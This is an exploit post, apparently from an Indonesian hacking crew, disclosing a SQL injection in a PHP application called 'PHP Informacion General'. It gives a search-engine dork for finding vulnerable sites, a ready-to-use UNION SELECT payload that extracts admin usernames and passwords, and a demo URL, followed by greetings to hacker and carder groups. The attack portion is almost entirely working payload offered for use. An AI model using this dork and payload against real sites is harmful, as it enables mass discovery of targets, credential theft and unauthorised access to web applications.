=====================================================
PHP Informacion General SQL Injection Vulnerability
=====================================================

[+]Title	 : PHP Informacion General SQL Injection Vulnerability
[+]Software  	 : PHP Informacion General
[+]Vendor 	 : NN
[+]Download	 : NN
[+]Author	 : jos_ali_joe
[+]Contact	 : josalijoe[at]hotmail[dot]com
[+]Web		 : http://alicoder.wordpress.com/ ( New Blog jos_ali_joe )
[+]Home 	 : http://indonesiancoder.com/ & http://explorecrew.org/



.___             .___                                .__                 _________              .___                
|   |  ____    __| _/  ____    ____    ____    ______|__|_____     ____  \_   ___ \   ____    __| _/  ____  _______ 
|   | /    \  / __ |  /  _ \  /    \ _/ __ \  /  ___/|  |\__  \   /    \ /    \  \/  /  _ \  / __ | _/ __ \ \_  __ \
|   ||   |  \/ /_/ | (  <_> )|   |  \\  ___/  \___ \ |  | / __ \_|   |  \\     \____(  <_> )/ /_/ | \  ___/  |  | \/
|___||___|  /\____ |  \____/ |___|  / \___  >/____  >|__|(____  /|___|  / \______  / \____/ \____ |  \___  > |__|   
          \/      \/              \/      \/      \/          \/      \/         \/              \/      \/         


########################################################################

Dork : inurl:"informacion_general.php?id="

########################################################################

------------------------------------------------------------------------

SQL Exploit

Exploit : +union+select+1,group_concat(username,char,password),3,4,5,6,7,8,9+from+admin--

Demo 

Exploit :

http://127.0.0.1/informacion_general.php?id=-19+union+select+1,group_concat(username,char,password),3,4,5,6,7,8,9+from+admin--

--------------------------------------------------------------------------


Greets For :

./Devilzc0de crew - Kebumen Cyber - Indonesian Hacker - Tecon Crew - Magelang Cyber - Malang Cyber - kill-9 

./Byroe Net - Yogya Carderlink - aten4 - Wannabe Hacker - Tecon Crew - DuniaSantai.com - All Underground Forum Indonesia

My Team : ./Indonesian Coder & Explore Crew

Special Thanks :

Security Reason - Packetstorm Security


[+] Note : 

Hacking bukanlah tentang jawaban. Hacking adalah tentang jalan yang kamu ambil untuk mencari jawaban. 
Jika kamu membutuhkan bantuan, Jangan bertanya untuk mendapatkan jawaban, 
Bertanyalah tentang jalan yang harus kamu ambil untuk mencari jawaban untuk dirimu sendiri.